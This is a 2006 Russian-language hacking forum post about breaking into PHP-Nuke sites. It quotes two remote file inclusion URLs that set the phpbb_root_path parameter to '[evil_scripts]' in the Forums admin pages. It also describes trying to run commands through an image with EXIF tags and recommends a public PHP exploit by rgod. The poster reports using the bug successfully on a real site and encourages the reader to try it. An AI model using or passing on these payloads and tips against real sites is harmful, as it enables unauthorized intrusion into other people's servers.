Тема: PHP nuke
Показать сообщение отдельно

  #4  
Старый 17.10.2006, 15:17
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию

Во многих последних версиях отсутствует фильтрация переменной phpbb_root_path в админке форума. Конкрентно я пытался заюзать эту багу 2 раза - один раз получилось, другой - нет. Второй раз помню точно из-за того, что не было прав админа. Хотя первый раз обошелся без них.
Как сказано на milworme:
Цитата:
http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
Настоятельно советую всегда смотреть индекс.

Кроме того, там был баг в подгрузке модулей. Я пытался подгрузить картинку с EXIF-тегами, само собой она загрузилась, но при попытке выполнить команду выдавало Internal Server Error. Попробуй ты - может у тебя получится. А, млин, вспомнил - это я админом уже был. (

Тогда попробуй сплоит на php от rgod'a. Сплоит собирается без проблем, но для его использования необходимо знать полный путь к порталу, а в моем случае я его найти не смог (это - до того, как был админом).
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
 
Ответить с цитированием